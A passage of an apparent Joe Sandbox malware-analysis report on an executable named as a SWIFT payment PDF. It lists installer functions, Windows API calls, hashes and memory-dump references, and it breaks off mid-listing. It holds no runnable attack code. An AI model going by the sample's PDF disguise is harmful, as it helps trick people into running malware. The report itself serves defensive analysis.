                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 0406370b8f003bb152fa9e6d882341a85f632a90c69b99869c7c344d59a0b238
                                      • Instruction ID: c88b0ddfb076c9ac8c8172e2ede98752ab09736af03c38ff4908af3a3297ae85
                                      • Opcode Fuzzy Hash: 0406370b8f003bb152fa9e6d882341a85f632a90c69b99869c7c344d59a0b238
                                      • Instruction Fuzzy Hash: 6CD01233B041149BCB00DBA89E4899D77A0DB44325F248637D111F11D1D6BD85416619
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403ED3 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(000103F0,00000000,00000000,00000000), ref: 00403EE5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                      • Instruction ID: 47e4f8cec5362ef7ba492606aa4db3ba17659bb6329be143cabb9808bdc3d1f3
                                      • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                      • Instruction Fuzzy Hash: 03C04C716482016BEA218B519D49F177758A750701F188425B610A50D0C675E410D66D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004030A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403EBC Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                      • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                      • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                      • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403EA9 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403C86), ref: 00403EB3
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                      • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                      • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                      • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040564F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000020), ref: 0040565C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID:
                                      • API String ID: 3213498283-0
                                      • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                      • Instruction ID: 6e4b35d103a21483788ebd864c5a0626f5b9ee6a2529c86503c35e2e2383ccd4
                                      • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                      • Instruction Fuzzy Hash: B9C0803440C74467C71057305434C677FE0EA71301F9C4C56F0C963150C135A800CF1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00404801 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                      • GetDlgItem.USER32(?,00000408), ref: 00404824
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040486E
                                      • LoadBitmapA.USER32(0000006E), ref: 00404881
                                      • SetWindowLongA.USER32(?,000000FC,00404DF8), ref: 0040489A
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048AE
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C0
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004048D6
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E2
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F4
                                      • DeleteObject.GDI32(00000000), ref: 004048F7
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404922
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040492E
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C3
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049EE
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A02
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404A31
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A3F
                                      • ShowWindow.USER32(?,00000005), ref: 00404A50
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B4D
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB2
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC7
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BEB
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404C20
                                      • GlobalFree.KERNEL32(00000000), ref: 00404C30
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA9
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404D52
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D61
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D81
                                      • ShowWindow.USER32(?,00000000), ref: 00404DCF
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404DDA
                                      • ShowWindow.USER32(00000000), ref: 00404DE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 5c97457c4d1d97535a494aa813db42837bbe9887a2ccc9027b3f96986e3e390d
                                      • Instruction ID: 73e5042133b470fdde48d750d06e43d2904589ccee469aaf4ee40575ec54014f
                                      • Opcode Fuzzy Hash: 5c97457c4d1d97535a494aa813db42837bbe9887a2ccc9027b3f96986e3e390d
                                      • Instruction Fuzzy Hash: 59027FB0900209AFEB10DF54DC85AAE7BB5FB84315F10853AF610B62E1C7799E42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004042C5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404314
                                      • SetWindowTextA.USER32(00000000,?), ref: 0040433E
                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043EF
                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FA
                                      • lstrcmpiA.KERNEL32(Call,Epicurize Setup: Installing), ref: 0040442C
                                      • lstrcatA.KERNEL32(?,Call), ref: 00404438
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444A
                                        • Part of subcall function 0040538C: GetDlgItemTextA.USER32(?,?,00000400,00404481), ref: 0040539F
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 00404505
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404520
                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A$C:\Users\user\udskriftskartotek\chiromancy\refalling$Call$Epicurize Setup: Installing
                                      • API String ID: 2246997448-2569746891
                                      • Opcode ID: f4b395fbc956a3f401c18fbd49a21f44177e585b157c0ae4a54349ed1422c75f
                                      • Instruction ID: 03cdc0df629eda19bc81850558ffdd0616f3ff49271ebeceec1b5cb03d6b2ac4
                                      • Opcode Fuzzy Hash: f4b395fbc956a3f401c18fbd49a21f44177e585b157c0ae4a54349ed1422c75f
                                      • Instruction Fuzzy Hash: DB9192B1900208BBDB11AFA1CC81AAF77B8EF85305F14447BFB01B62D1D77C9A418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040264F Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: 23c103152627ce6bba449e45accf03574f1600b64c0886b4bf333a450fa6d8b6
                                      • Instruction ID: 3ab4b2e523f4ece34398282fff8650a64823828ee778d7c177d23f294cc8494d
                                      • Opcode Fuzzy Hash: 23c103152627ce6bba449e45accf03574f1600b64c0886b4bf333a450fa6d8b6
                                      • Instruction Fuzzy Hash: FAF0A032A041149AD700E7B4A949AEEB778CB15324F20067BE101E20C2C6B869859A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403FD0 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040405B
                                      • GetDlgItem.USER32(00000000,000003E8), ref: 0040406F
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040408D
                                      • GetSysColor.USER32(?), ref: 0040409E
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040AD
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040BC
                                      • lstrlenA.KERNEL32(?), ref: 004040BF
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CE
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E3
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404145
                                      • SendMessageA.USER32(00000000), ref: 00404148
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404173
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B3
                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004041C2
                                      • SetCursor.USER32(00000000), ref: 004041CB
                                      • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041DE
                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004041EB
                                      • SetCursor.USER32(00000000), ref: 004041EE
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421A
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: Call$N$open
                                      • API String ID: 3615053054-2563687911
                                      • Opcode ID: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction ID: 031dbeac94855a04ab7bc056baf49b9f62a127ba2e136bb98bc4968a945489ce
                                      • Opcode Fuzzy Hash: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                      • Instruction Fuzzy Hash: DF61B971A40209BFEB109F60CC45F6A3B69FB84755F10816AFB047B2D1C7B8A951CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040589D Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
